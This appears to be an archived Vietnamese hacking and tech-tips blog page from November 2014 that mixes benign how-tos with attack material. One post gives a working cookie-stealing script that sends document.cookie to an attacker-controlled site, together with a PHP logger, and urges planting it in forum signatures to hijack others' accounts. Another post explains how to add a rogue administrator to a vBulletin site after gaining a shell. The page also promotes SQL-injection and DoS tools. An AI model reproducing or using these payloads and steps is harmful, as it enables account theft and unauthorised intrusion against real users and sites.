Forum in Đế Vương team: tháng 11 2014

Thứ Ba, 25 tháng 11, 2014

Khắc phục lỗi vỡ khung trên trình duyệt Chrome

Khắc phục lỗi vỡ khung trên trình duyệt Chrome

Sau khi cập nhật trình duyệt Chrome lên phiên bản 39.0, chắc hẳn nhiều bạn sẽ nhận ra một số trang web hiển thị "không bình thường" như mọi khi. Đây không phải là do các trang web bị lỗi mà do một số thay đổi nhỏ trong phiên bản mới của Chrome.

ĐỌC TIẾP »

Tại sao AutoIt luôn bị “ghét”?

Tại sao AutoIt luôn bị “ghét”?

"Ghét" ở đây không hẳn là mọi người ghét mà là mình muốn nói tới việc các trình diệt vi-rút "ghét" AutoIt. Tại sao vậy?

Nếu bạn nào chưa biết thì AutoIt là một ngôn ngữ kịch bản (Scripting Language) được viết trên nền C++. Là một người yêu thích ngôn ngữ AutoIt và với kinh nghiệm 2 năm viết những ứng dụng bằng ngôn ngữ AutoIt, mình sẽ viết bài này theo quan điểm cá nhân. Mình thì biết một số ngôn ngữ lập trình và ngôn ngữ kịch bản bao gồm PHP, JS, VB.Net, C#, Python và AutoIt. Trong đó thì mình có khả năng tốt nhất ở 3 ngôn ngữ là PHP/JS/AutoIt (tốt là do mình thường xuyên sử dụng).

ĐỌC TIẾP »

Chủ Nhật, 23 tháng 11, 2014

Tạo Một Cookieloger Để Lấy Trộm Cookie Đơn Giản

Lấy trộm Cookie để làm gì? để đăng nhập ngoài sự cho phép của họ rồi làm gì là việc của bạn chẳng hạn hack acc facebook,yahoo,....

Đầu tiên mở notepad cho vào đoạn code sau rồi lưu với 1 tên bất kì..Giả sử là HACKER.gif

<script>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>

Tiếp tục copy đoạn code sau cho vào notepad và lưu lại với tên cookielogger.php:

<?php$filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) {echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary Server Error,Sorry for the inconvenience.”; fclose($handle); exit; } echo “Temporary Server Error,Sorry for the inconvenience.”; exit; ?>

Tạo thêm 1 file là logfile.txt rồi vất cả 3 file lên host. Chmod lại file logfile.txt 777 để có quyền ghi lên nó.

cookielogger.php -> http://www.yoursite.com/cookielogger.php logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777) HACKER.gif -> http://www.yoursite.com/HACKER.gif

Rồi đi tìm victim dụ thôi.Ví dụ như chèn đoạn code này vào chữ kí ở forum chẳng hạn.Ngồi chờ tên nào rãnh kích vào và thịt thôi

Config Sever Chống Local hiệu quả

1. Login Vào Root Account.
2. Mở File “php.ini” Trong Pico Editor

[ pico /usr/local/lib/php.ini ]

3. Find :”Safe_Mode”
4.

[ Ctrl + W and type "Safe_Mode" ]

5. Đổi Off thành On.

[ "safe_mode = Off" to "safe_mode = On" ]

6. Find”disabled_functions”
7.

[ Ctrl + W and type "disabled_functions" ]

8. Thêm Vài Functions ( Dis Hàm ) Cho Nó Khỏi Local :

[system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source]

9. Save lại và Retart lại Apache web server

[ /etc/init.d/httpd restart ] 

P/s : Backup File php.in trước.

HTTP Là Gì? HTTPS Là Gì? Sự Khác Nhau Giữa HTTP Và HTTPS

1. HTTP là gì?

HTTP là chữ viết tắt từ HyperText Transfer Protocol (giao thức truyền tải siêu văn bản). Nó là giao thức cơ bản mà World Wide Web sử dụng. HTTP xác định cách các thông điệp (các file văn bản, hình ảnh đồ hoạ, âm thanh, video, và các file multimedia khác) được định dạng và truyền tải ra sao, và những hành động nào mà các Web server (máy chủ Web) và các trình duyệt Web (browser) phải làm để đáp ứng các lệnh rất đa dạng. Chẳng hạn, khi bạn gõ một địa chỉ Web URL vào trình duyệt Web, một lệnh HTTP sẽ được gửi tới Web server để ra lệnh và hướng dẫn nó tìm đúng trang Web được yêu cầu và kéo về mở trên trình duyệt Web. Nói nôm na hơn, HTTP là giao thức truyền tải các file từ một Web server vào một trình duyệt Web để người dùng có thể xem một trang Web đang hiện diện trên Internet.HTTP là một giao thức ứng dụng của bộ giao thức TCP/IP (các giao thức nền tảng cho Internet).

2. HTTPS là gì?

HTTPS( Secure HTTP), là một sự kết hợp giữa giao thức HTTP và giao thức bảo mật SSL hay TLS cho phép trao đổi thông tin một cách bảo mật trên Internet. Các kết nối HTTPS thường được sử dụng cho các giao dịch thanh toán trên World Wide Web và cho các giao dịch nhạy cảm trong các hệ thống thông tin công ty. HTTPS được sử dụng trong nhiều tình huống, chẳng hạn như các trang đăng nhập cho ngân hàng, các hình thức, ích đăng nhập công ty, và các ứng dụng khác, trong đó dữ liệu cần phải được an toàn.HTTPS không nên nhầm lẫn với Secure HTTP (S-HTTP) quy định trong RFC 2660.

Sự khác nhau giữa HTTP và HTTPS?

Theo 2 định nghĩa ở trên từ đó ta có thể thấy nếu trang web có địa chỉ bắt đầu bằng http:// thì nó có nghĩa rằng trang web không an toàn. Nói cách khác, một người nào đó có thể nghe lén những gì bạn trao đổi với trang web và có thể lấy những dữ kiện bạn gửi đi từ máy của bạn đến trang web như tên tuổi, căn cước, địa chỉ, số thẻ tín dụng, v..v…Do đó bạn không nên điền số thẻ tín dụng trên trang nhà nêú địa chỉ của nó bắt đầu bằng http.Nhưng nếu địa chỉ của trang web bắt đầu bằng chữ https:// thì điều này có nghĩa là bạn đang liên lạc an toàn với server của trang web và người ta không thể nghe lén và trôm những thông tin bạn gửi đi.Chắc bây giờ bạn đã hiểu mức quan trọng của chữ S trong https:// lớn như thế nào. Do đó, khi trang web bảo bạn điền những tin tức riêng của bạn vào những khung điền thông tin trên trang web, nhất là những thông tin quan trọng như số thẻ tín dụng,hay số an sinh xã hội, ngày sinh tháng đẻ, số passport, các passwords v…v…, thì trước tiên bạn phải nhìn vào địa chỉ để xem nó có chữ S sau http hay không tức là địa chỉ trang web có bắt đầu bằng https:// hay không. Nếu không, bạn không nên trao đổi những thông tin nhậy cảm đó với trang web.

ICANN Là Gì?

ICANN là nơi quản lý tất cả các domain quốc tế để xem thông tin chi tiết vui lòng vào: ICANN.ORG.

Cơ quan Internet quản lý số liệu và tên miền được chuyển nhượng (Tiếng Anh: Internet Corporation for Assigned Names and Numbers (ICANN)) là một tổ chức phi lợi nhuận đặt trụ sở tại Marina del Rey, California, United States. ICANN được thành lập ngày 18 tháng 9 năm 1998 và hợp nhập vào ngày 30 tháng 9 năm 1998 để giám xác một số nhiệm vụ liên quan tới Internet mà trước đây được thực hiện trực tiếp bởi các tổ chức khác trên danh nghĩa của chính phủ Mỹ, mà đáng chú ý trong số đó là IANA ICANN chịu trách nhiệm trong việc quản lý không gian địa chỉ IP (IPv4 và IPv6) và việc phân phối các khối địa chỉ tới các cơ quan đăng ký Internet khu vực. Duy trì các cơ quan đăng ký tên định danh IP; Quản lý không gian tên miền cấp cao nhất (miền DNS gốc), bao gồm việc điều hành của những máy phục vụ tên gốc. Phần lớn các công việc của ICANN liên quan tới việc giới thiệu của những miền cấp cao mới (top-level domains (TLDs)). Công việc kĩ thuật của ICANN giống như chức năng của IANA. Những nguyên tắc cơ bản hàng đầu trong việc điều hành của ICANN được mô tả như việc giúp đỡ duy trì sự hoạt động ổn định của Internet; thúc đẩy việc cạnh tranh; đạt được sự đại diện rộng rãi của cộng đồng Internet toàn cầu và xây dựng chính sách phù hợp với nhiệm vụ của ICANN thông qua các quá trình từ dưới lên, dựa trên sự nhất trí ý kiến. Vào ngày 29 tháng 9 năm 2006, ICANN đã ký một thỏa thuận với Bộ Thương Mại Hoa Kỳ về việc đưa tổ chức tư nhân vào sự quản lý toàn diện của hệ thống các tên định danh được điều phối tập trung của Internet thông qua mô hình nhiều phía cùng có lợi trong việc trao đổi ý kiến mà ICANN đại diện.

SlowHTTPTest – Phần Mềm Mô Phỏng Tấn Công Ddos

SlowHTTPTest là một công cụ cấu hình nâng cao, mô phỏng một cuộc tấn công từ chối dịch vụ. Nó hoạt động trên hầu hết các nền tảng Linux, OSX và Cygwin và một môi trường giống Unix, giao diện command-line cho Microsoft Windows.

Nó thực hiện các cuộc tấn công tại tầng ứng dụng và tấn công vào băng thông thấp phổ biến như các cuộc tấn công slowloris, Slow HTTP POST, Slow Read (dựa trên giao thức TCP với thời gian khai thác kéo dài), cũng như tấn công Apache Range Header bằng cách gây quá tải bộ nhớ và CPU trên máy chủ.

Slowloris và Slow HTTP POST DoS tấn công dựa trên các giao thức HTTP vốn thiết kế đòi hỏi các request phải hoàn toàn được nhận bởi máy chủ trước khi được thực thi. Nếu một request HTTP không đầy đủ hoặc nếu tốc độ truyền tải thấp, máy chủ phải giữ nguồn tài nguyên đó ở chế độ busy và chờ đợi phần còn lại của dữ liệu. Nếu máy chủ giữ quá nhiều tài nguyền busy sẽ gây ra từ chối dịch vụ và không thể đáp ứng các yêu cầu khác. Công cụ này gửi các request HTTP không đầy đủ và cố gắng thực hiện một cuộc tấn công từ chối dịch vụ để kiểm tra khả năng chịu tải của máy chủ HTTP.

Download

Có thể xác định danh tính của hơn 81% người dùng Tor

Mạng ẩn danh Tor nổi tiếng là có khả năng giấu kín được danh tính cũng như vị trí truy cập của người dùng. Nó luôn là một mục tiêu khó khăn của cơ quan thực thi pháp luật trong nhiều năm và FBI đã phải chi hàng triệu đô la để xác định danh tính của người sử dụng Tor nhưng chưa thành công. Tuy nhiên, trong một nghiên cứu gần đây cho thấy, có thể xác định danh tính của hơn 81% người dùng Tor thông qua phần mềm phân tích lưu lượng truy cập có tên Netflow mà Cisco đã xây dựng vào giao thức định tuyến của họ.

NetFlow là một giao thức mạng được thiết kế để thu thập và theo dõi lưu lượng mạng. Nó trao đổi dữ liệu trong dòng mạng, có thể tương ứng với các kết nối TCP hoặc các gói tin IP chia sẻ đặc điểm chung, các gói tin UDP chia sẻ nguồn và địa chỉ IP, số cổng và các thông tin khác.

Nghiên cứu được tiến hành trong sáu năm của giáo sư Sambuddho Chakravarty, một nhà nghiên cứu về mạng ẩn danh và bảo mật tại Viện Indraprastha về Công nghệ thông tin ở Delhi. Chakravarty sử dụng một kỹ thuật nhằm xác định các “rơle” Tor có liên quan đến một máy chủ Tor đã được cải tiến chạy Linux mà khách hàng mục tiêu truy cập, sau đó sửa đổi nút Tor đó mà có thể hình thành một mạch hop với các nút tùy ý.

Theo các nhà nghiên cứu, máy chủ điều chỉnh các dữ liệu trước khi được gửi lại cho khách hàng, trong khi các nút corrupt Tor được sử dụng để trì hoãn việc đo lường giữa chính nó và các Tor nodes khác. Trong báo cáo, các nhà nghiên cứu cũng cho biết, để thực hiện các cuộc tấn công phân tích lưu lượng truy cập quy mô lớn trong môi trường Tor, không nhất thiết phải cần đến các nguồn lực của cả một quốc gia. Thậm chí, một AS (Autonomous System) duy nhất cũng có thể theo dõi hơn 39% các mạch Tor được tạo ra ngẫu nhiên.

Kỹ thuật này phụ thuộc vào việc tiêm nhiễm một mô hình lưu lượng lặp đi lặp lại đến các kết nối TCP mà nó quan sát từ exit node của mục tiêu. Sau đó tính lưu lượng đầu ra của máy chủ, từ thông tin lưu lại của router để xác định người dùng Tor.

Do được thiết kế như một mạng ẩn danh có độ trễ thấp, Tor dễ bị tổn thương với loại phân tích lưu lượng truy cập này.

THN

8 công cụ miễn phí bảo vệ máy tính của bạn khỏi Botnet

Trong bài viết này, mình xin giới thiệu với các bạn 8 công cụ miễn phí giúp tìm và loại bỏ Botnet nếu như bạn bị nhiễm. Đây là các công cụ, phần mềm miễn phí từ Microsoft và các công ty bảo mật nổi tiếng khác.

Botnet là mạng lưới các máy tính bị điều khiển bởi những kẻ tấn công từ xa để thực hiện nhiệm vụ bất hợp pháp như gửi thư rắc hoặc tấn công các máy tính, trang web khác.
Malicious Software Removal Tool

Malicious Software Removal Tool là một công cụ giúp loại bỏ các phần mềm độc hại bao gồm cả Bot. Microsoft phát hành một phiên bản cập nhật của công cụ này vào ngày Thứ Ba thứ hai mỗi tháng khi cần thiết để ứng phó sự cố an ninh. Các phiên bản mới của công cụ này được cung cấp bởi Windows Update chạy nền và sau đó báo cáo nếu có mối nguy hiểm được tìm thấy. Nhưng bạn cũng có thể tải về và sử dụng nó bất cứ khi nào bạn cần.
Phrozensoft Mirage Anti-Bot

Phrozensoft Mirage Anti-Bot sẽ tự động cập nhật tập tin hosts trên máy tính của bạn, sử dụng dữ liệu được cung cấp bởi trang web antimalware nổi tiếng www.abuse.ch. Bằng cách thêm các trang web trong danh sách bị chặn, bot sẽ không thể gửi truy vấn về máy chủ.
Trend Micro RUBotted

RUBotted theo dõi các nguy cơ lây nhiễm trên máy tính của bạn và các hoạt động đáng ngờ liên quan đến bot. Khi phát hiện một nguy cơ lây nhiễm, RUBotted sẽ nhận diện và ngăn chặn nó với HouseCall.
Norton Power Eraser

Norton Power Eraser loại bỏ mã độc được nhúng và các phần mềm độc hại khó gỡ bỏ mà các trình diệt virus thông thường không phải lúc nào cũng nhận diện được.
BotHunter

BotHunter là một công cụ chẩn đoán Botnet cho Windows, Unix, Linux và Mac OS giúp tương quan hai chiều thông tin liên lạc giữa các máy tính có lỗ hổng và tin tặc.
Avira BotFrei

BotFrei từ Avira là một công cụ miễn phí sẽ phát hiện và loại bỏ sự lây nhiễm bot từ hệ thống của bạn.
Kaspersky DE-Cleaner

DE-Cleaner được cung cấp bởi Kaspersky và cũng được gọi là Kaspersky Anti-Botnet. Bạn có thể tải nó về từ Chip.de. Chú ý giao diện hiện tại có ngôn ngữ là tiếng Đức.
Bot Revolt

Bot Revolt hoạt động ngầm trong kết nối mạng và giám sát mọi thứ đi qua nó. Nó liên tục theo dõi tất cả thông tin gửi tới máy tính của bạn. Phần mềm quét tự động mỗi 0,002 giây để tìm kiếm bất kỳ thông tin đáng ngờ hoặc trái phép, và ngăn chặn cuộc tấn công từ tin tặc hoặc các cuộc tấn công botnet tới máy tính của bạn. Tải về

The Mole – Công cụ tự động khai thác lỗ hổng SQL Injection

The Mole là một công cụ tự động khai thác SQL Injection. Chỉ cần cung cấp một URL và một chuỗi giá trị có hiệu lực trên trang web, The Mole có thể phát hiện lỗ hổng và khai thác các lỗ hổng đó hoặc sử dụng kết hợp với các kỹ thuật khác hay kĩ thuật truy vấn theo kiểu boolean.

TÍNH NĂNG NỔI BẬT

Hỗ trợ hệ quản trị cơ sở dữ liệu MySQL, SQL Server, Postgres và Oracle.
Giao diện command line. Các dòng lệnh khác nhau thực hiện chức năng khác nhau.
Tự động hoàn thành lệnh, đối số và cơ sở dữ liệu, tên bảng và tên cột.
Hỗ trợ bộ lọc để vượt qua quy tắc thông thường của IPS/IDS và tạo ra quy tắc mới dễ dàng kết hợp hơn.
Khai thác SQL Injections thông qua các tham số GET/POST/Cookie.
Được phát triển trên python 3.x.
Sử dụng đơn giản.

Bạn có thể xem thêm hướng dẫn sử dụng và cài đặt trên trang chủ của The Mole

The Mole - Digging up your data

SecurityDaily

Nguyên Tắc Cơ Bản Của TCP Syn Flood

Kiểu tấn công TCP SYN flood là một kiểu tấn công trực tiếp vào máy chủ bằng cách tạo ra một số lượng lớn các kết nối TCP nhưng không hoàn thành các kết nối này.
Phía kẻ tấn công sẽ khởi tạo nhiều TCP, trong mỗi kết nối chỉ để cờ TCP SYN. Máy chủ sẽ gửi lại trả lời vớI TCP SYN và ACK. Nhưng sau đó máy tấn công đơn giản là không trả lời thông điệp thứ ba như mong đợi của server theo tiến trình bắt tay ba chiều. Server lúc này sẽ tốn bộ nhớ và tài nguyên trong khi chờ các phiên TCP timeouts hoặc trước khi các kết nối đang thiết lập dang dở được dọn dẹp. Máy server lúc này có thể từ chối các kết nối TCP khác và các thiết bị cân bằng tải trong các server farm lúc này có thể chia tải không cân bằng. Các firewall có hỗ trợ cơ chế stateful có thể ngăn ngừa kiểu tấn công TCP SYN attack này.

Một cách để ngăn ngừa kiểu tấn công SYN attack là đơn giản loại bỏ các gói TCP header trong đó chỉ có cờ SYN được thiết lập. Nói cách khác, loại bỏ tất cả các gói tin đầu tiên trong một kết nối TCP mới. Trong nhiều trường hợp, một router không nên cho phép các kết nối TCP được thiết lập bởi client. Trong trường hợp này, việc lọc các TCP segment ban đầu giúp ngăn ngừa SYN attack.

Công cụ Cisco IOS ACLs không thể match trực tiếp cờ TCP SYN trong một gói tin. Tuy nhiên một ACL có thể dùng từ khóa establised để tìm ra những tcp segment có cờ ACK được thiết lập. Từ khóa established có thể match tất cả các TCP segment ngoại trừ TCP segment đầu tiên trong một kết nối mới. Cấu hình dưới đây sẽ dùng trên R1 để từ chối những yêu cầu kết nối mới từ Internet đi vào mạng bên trong ASN1.

Dòng ACE đầu tiên sẽ lựa ra các phân đoạn TCP không phảI là segment đầu tiên và cho phép các segment này. Dòng ACE thứ hai sẽ lựa ra tất cả các TCP segment, nhưng vì tất các các segment không phảilà đầu tiên đã dính vớI dòng đầu tiên, dòng thứ hai này sẽ chỉ so trùng vớI các segment đầu tiên.

ip access-list extended prevent-synpermit tcp any 1.0.0.0 0.255.255.255 establisheddeny tcp any 1.0.0.0 0.255.255.255permit (whatever)!interface s0/0ip access-group prevent-syn in

ACL hoạt động tốt khi client nằm bên ngoài mạng không được phép tạo kết nối TCP vào mạng bên trong. Tuy nhiên trong những trường hợp các kết nối TCP vào bên trong là được phép, ACL này không thể được dùng.

Một đặc điểm khác của CiscoIOS được gọi là TCP intercept cho phép các kết nối TCP đi vào mạng nhưng giám sát các kết nối này để chống kiểu tấn công TCP SYN. TCP Intercept hoạt động trong hai chế độ. Trong chế độ watch, nó theo dõi thông tin trạng thái của kết nốI TCP match với một ACL. Nếu kết nối TCP không hoàn bắt tay hai chiều trong một khoảng thời gian, TCP intercepts sẽ gửi một thông điệp TCP reset đến máy server, dọn dẹp kết nối. Nó cũng sẽ đến số kết nối mới trong một khoảng thời gian và nếu có một số lớn kết nối trong một giây (“lớn” có giá trị mặc định là 1100), router sẽ tạm thời lọc các yêu cầu thiết lập TCP mới.

Trong chế độ intercept, router sẽ trả lời đến các yêu cầu thiết lập TCP thay vì chuyển các yêu cầu này về server. Sau đó, nếu quá trình bắt tay 3 lần hoàn thành, router sẽ tạo ra một kết nối giữa nó và server. Ở thời điểm này, router đã nối chặt hai kết nối với nhau. Chế độ này làm tốn nhiều tải nhưng bảo vệ tốt hơn cho server.

Các lệnh dưới đây sẽ bật cơ chế TCP intercept cho những gói tin so trùng với ACL match-tcp-from-internet. Ngoài ra, chế độ được thiết lập là chế độ watch, còn chế độ mặc định là intercept. Cuối cùng, lệnh watch timeout đã được đưa về chế độ mặc định là 30 giây. Nếu kết nối TCP vẫn trong tình trạng không hoàn tất, cơ chế TCP intercept sẽ khởi động kết nối.

ip tcp intercept-list match-tcp-from-internetip tcp intercept mode watchip tcp intercept watch-timeout 20

ACL sẽ lựa ra tất cả các gói tin gửi đến địa chỉ 1.0.0.0/8 và dùng TCP. ACL này sẽ tham chiếu đến các lệnh ip tcp intercept-list ở trên.

ip access-list extended match-tcp-from-internetpermit tcp any 1.0.0.0 0.255.255.255

Chú ý rằng ACL không được áp dụng vào bất kỳ cổng nào.

interface s0/0
!

Login Vào Admin Cp Khi Bị Giới Hạn Quyền Truy Cập

Thông thường khi hack web, việc có shell trên server là điều mà các hacker luôn mong muốn. Bởi khi có shell chúng ta sẽ có được thông tin về database...--> có được tài khoản Admin hoặc tạo thêm được tài khoản Admin quản trị website.

Ta sẽ không đề cập đến vấn đề chiếm quyền Admin hiện tại, mà ở đây, với 1 database chúng ta có thể tạo thêm user trong database, gán id group cho user đó nằm trong administrator group, mặc định của group này có id là 6.

Tuy nhiên, khi đã trong nhóm Administrator rồi nhưng chúng ta không thể đăng nhập được vào Admin CP, do đó cần phải thêm id của user đó vào file config. Mặc định file config.php được đặt tại
/includes/config.phpChúng ta cần sửa 3 thông số :

$config['SpecialUsers']['superadministrators'] = '1';$config['SpecialUsers']['canviewadminlog'] = '1';$config['SpecialUsers']['canpruneadminlog'] = '1';

Bạn hãy tạo thêm 1 nik name với id khác vd như abc với id là 123 chẳng hạn. Sau đó thêm vào :

$config['SpecialUsers']['superadministrators'] = '1,123';$config['SpecialUsers']['canviewadminlog'] = '1,123';$config['SpecialUsers']['canpruneadminlog'] = '1,123';

Khi đó, bạn sẽ login được vào AdminCP. Nếu trường hợp Admincp bị đặt htaccess thì chúng ta đổi password trong file .htpasswd.

Thứ Bảy, 22 tháng 11, 2014

[PHP] Plugins Detector

Code:

http://bitbin.it/bfSn6nvg

Thứ Năm, 20 tháng 11, 2014

Đổi tên Page Facebook trên 200 Like

Đổi tên Page Facebook trên 200 Like

Facebook chỉ chấp nhận đổi tên cho Page khi đang có dưới 200 người thích. Trong bài viết này, mình sẽ hướng dẫn các bạn đổi tên cho Page có trên 200 lượt thích.

ĐỌC TIẾP »

Cắt ảnh cho Album Facebook cực kì đơn giản với Image Splitter

Cắt ảnh với Image Splitter

Thủ thuật xếp nhiều ảnh nhỏ thành một ảnh lớn trong mục Album trên Facebook đã có từ lâu. Với những bạn nào biết chút ít về Photoshop thì việc cắt ảnh thành nhiều phần không quá khó. Tuy nhiên cũng có nhiều bạn gặp rắc rối trong vấn đề này.

Hôm nay mình xin giới thiệu với các bạn một phần mềm nhỏ của tác giả wakillon tên là Image Splitter. Phần mềm này có tác dụng chia nhỏ một hình ảnh thành nhiều phần với số cột và số hàng do ta chỉ định.

ĐỌC TIẾP »

Thứ Tư, 19 tháng 11, 2014

Tùy chỉnh thanh cuộn cho IE, Chrome và Firefox bằng CSS

Sử dụng Tùy chỉnh Thanh cuộn trong trang web của bạn có thể rất bắt mắt và tạo sự ấn tượng về thiết kế của trang web bạn. Đối với người thiết kế web, việc sử dụng JavaScript để tùy chỉnh là rất phức tạp. Thay vào đó, bạn có thể dễ dàng tùy chỉnh Thanh cuộn với CSS. Trước đây có thể việc sử dụng CSS chỉ có thể làm việc trên trình duyệt Internet Explorer. Nhưng gần đây, CSS có thể làm việc hầu hết trên mọi trình duyệt. Và sau đây là một số hướng dẫn tùy chỉnh trên các trình duyệt thông dụng.

Tùy chỉnh trên trình duyệt Internet Explorer

Code:

http://bitbin.it/qoHwLdkJ

Giải thích:

Tùy chỉnh trên trình duyệt Chrome
Code:

http://bitbin.it/loDTpszU

Giải thích:

Với trình duyệt Chrome và Webkit, bạn có thể dễ dàng tùy chỉnh Thanh cuộn hơn trên trình duyệt IE, không chỉ thay đổi màu sắc, bạn có thể áp dụng các thuộc tính radius, transparency trên thanh cuộn.

Tùy chỉnh trên trình duyệt Firefox

Code:

http://bitbin.it/m1LUS6tb

Thứ Ba, 18 tháng 11, 2014

8 công cụ miễn phí bảo vệ máy tính của bạn khỏi Botnet

Trong bài viết này, Security Daily xin giới thiệu với các bạn 8 công cụ miễn phí giúp tìm và loại bỏ Botnet nếu như bạn bị nhiễm. Đây là các công cụ, phần mềm miễn phí từ Microsoft và các công ty bảo mật nổi tiếng khác.

ĐỌC TIẾP »

Chủ Nhật, 16 tháng 11, 2014

5 Lưu Ý Để Tránh Bị Khóa Tài Khoản Facebook

Facebook ngày càng khắt khe với người dùng, do đó bạn cần kiểm soát tốt tài khoản của mình để không bị khóa vĩnh viễn.

1. Kiểm soát hoạt động trên Facebook

Có thể bạn sẽ không biết được mình đã bị dính vào một số hoạt động không mấy tốt đẹp trên Facebook nếu không theo dõi mục Activities mỗi ngày. Bởi vì chỉ đơn giản như thao tác nhấn vào một liên kết trên Facebook, bạn đã có thể bị mã ẩn gây hại.

Chẳng hạn, việc tự động mời bạn bè tham gia ứng dụng, tự động đăng tải một nội dung khiêu dâm hay tự động tham gia các hoạt động phi pháp,... Do đó, rất có thể bạn sẽ bị mọi người báo cáo với Facebook rằng bạn hoạt động mờ ám, và Facebook sẽ xem xét khóa tài khoản của bạn.

2. Đừng kết bạn lung tung

Gửi yêu cầu kết bạn tới tất cả mọi người mà bạn thấy là hành động đưa bạn tới con đường bị chặn kết bạn. Do đó, chỉ gửi yêu cầu kết bạn tới những ai mà bạn thật sự quan tâm. Ngoài ra, cũng cần kiểm duyệt kỹ những lời mời kết bạn vì những người bạn lạ biết đâu sẽ báo cáo xấu bạn tới Facebook.

3. Không đăng thông tin câu Like, nhảm nhí

Facebook đủ thông minh để phát hiện các thông tin nhảm, thông tin chỉ nhằm mục đích câu Like trắng trợn. Để không bị khóa tài khoản, tốt nhất bạn hãy hoạt động trên mạng xã hội này một cách trong sáng.

4. Hạn chế đăng nhập tài khoản ở nhiều thiết bị, nhiều vị trí

Cũng là một công cụ tự động của Facebook, nó có khả năng đánh giá tài khoản người dùng có đang bị hacker chiếm dụng hay không, thông qua thông tin tài khoản đăng nhập từ các vị trí cách xa nhau trong những khoảng thời gian ngắn hay từ nhiều thiết bị.

5. Khai báo địa chỉ email thật, tên thật

Hãy chắc chắn là bạn đang làm chủ email tài khoản Facebook của mình để kịp thời cập nhật mọi thông tin mới từ Facebook, cũng như lấy lại tài khoản khi bị mất cắp. Bên cạnh đó, dùng tên thật cũng là một điều bạn cần chú ý tới, song đó không phải là yếu tố quan trọng, bởi thao tác này chỉ nhằm giúp bạn lấy lại tài khoản về sau là chính.

Hướng dẫn sửa lỗi download 99% bị dừng lại trên IDM

Bạn rất bức xúc khi IDM đang tải được 99% thì dừng lại, bao nhiêu công sức ngồi tải chẳng lẽ phải tải lại? Dưới đây chúng tôi có nêu ra cách có thể giúp các bạn sửa lỗi đó, các bạn có thể tham khảo thực hiện.
Tips: Với cách này bạn có thể áp dụng với IDM bị dừng bất kể thời điểm nào 40%, 50%, 66%… không nhất thiết phải là 99%.

===================================================================

Bước 1: Mở phần mềm IDM lên, click chuột phải vào file đang download mà bị dừng 99% và chọnproperties.

Copy link trong phần Referer.

Bước 2: Pase link vừa copy ở trên vào trình duyệt web của bạn và Enter.

Nhấn download để tải lại file bị lỗi 99% trước đó.

Khi IDM hiện lên cửa sổ download, các bạn chú ý là không tải file lại mà chỉ copy lại link trong phần URL như hình dưới và nhấn Cancel.

Bước 3: Quay lại IDM, click chuột phải vào file bị lỗi 99% đó, chọn Properties. Sau đó paste địa chỉ URL vừa copy ở trên vào ô Address, thay thế địa chỉ cũ. Sau đó nhấn OK.

Bước 4: Tiếp tục chọn Resume như hình dưới để IDM tiếp tục tải file bị lỗi 99% đó.

Với cách sửa lỗi IDM tải file đến 99% thì dừng lại này, các bạn có thể tiết kiệm rất nhiều thời gian cho việc tải lại file. Mà chưa chắc tải lại file không bị mắc tiếp lỗi này.

Chúc các bạn thành công!!!

ThuThuatTienIch

Làm gì khi máy tính không nhận USB?

Đừng vội vứt bỏ chiếc USB hay cài lại Windows gây tốn nhiều thời gian, bạn hãy thử một số giải pháp sau.

Máy tính không nhận USB là hiện tượng thường gặp đối với những chiếc USB lâu ngày hoặc sản phẩm kém chất lượng. Tuy nhiên, ngoài lí do hư phần cứng khó khắc phục được, thì phần mềm cũng là một trong những nguyên nhân bạn nên nghĩ tới.

Khi máy tính không nhận ra USB, bạn hãy thử theo các biện pháp sau:

Gắn USB ở một vài máy tính khác
Để chắc chắn lỗi không phải do chiếc máy tính hiện tại, bạn hãy thử cắm USB ở một vài máy tính khác. Nếu các máy tính kia vẫn nhận USB bình thường thì nhiều khả năng máy tính của bạn đang bị hư cổng USB hoặc lỗi phần mềm.

Riêng trường hợp hư cổng USB, bạn có thể kiểm tra lại bằng việc kết nối thử một chiếc USB hay thiết bị khác thông qua cùng cổng USB.

Làm sạch khe cắm USB và gia cố cáp nối
Nếu chiếc USB không thể được nhận diện trên bất kì thiết bị nào khác, nhiều khả năng USB của bạn đã bị hư phần cứng - thường là chết con chip bên trong. Hầu hết người dùng gặp trường hợp này đều sẽ mua USB mới vì giá một chiếc USB mới hiện nay không quá đắt.

Tuy nhiên, nếu sự cố chỉ xảy ra trên máy tính của bạn thì bạn hãy sử dụng cọ mềm lau bụi trong khe USB và cố định lại sợi cáp USB nối từ cổng USB vào bo mạch trên máy tính (thao tác này chủ yếu thực hiện trên máy tính để bàn).

Quét tìm lại thiết bị ngoại vi đang kết nối
Bạn nhấn chuột phải vào biểu tượng My Computer trên màn hình, chọn Properties. Trên giao diện hiện ra, nhấn "Scan for hardware changes" để Windows quét tìm lại tất cả các thiết bị ngoại vi có thể chưa được nhận diện và cài đặt driver cũng như kích hoạt chúng.

Ngoài ra, bạn cần kiểm tra ở nhóm "Univeral Serial Bus controllers" xem có mục nào đang bị vô hiệu hóa(Disable) hay không, nếu có thì hãy thử Enable chúng lên.

Quét virus toàn bộ máy tính
Trong một số trường hợp, bạn cũng nên thử quét virus toàn bộ máy tính cở chế độ Full Scan bằng một chương trình virus mạnh.

Hướng dẫn cài đặt nhanh các phần mềm từ Ninite

Khi bạn mua 1 máy tính mới tinh về hoặc vì nguyên nhân nào đó phải cài lại máy, lúc đó bạn phải cài lại toàn bộ các phần mềm cho máy từ nhỏ nhất như winrar,cclear,…đến những phần mềm lớn lớn chút như office.
Đó là lúc bạn cần tới Ninite

Bạn có thể sử dụng Ninite để cài đặt các ứng dụng hữu dụng bằng vài kích chuột – không có các thanh công cụ không mong muốn xuất hiện ở đây.

Ninite là một website cho phép bạn cài đặt một loạt các phần mềm miễn phí nhưng rất hữu dụng, không cần đến sự can thiệp của người dùng. Đơn giản, chỉ cần vào site và tích vào các hộp kiểm bên cạnh phần mềm mà bạn muốn cài đặt.

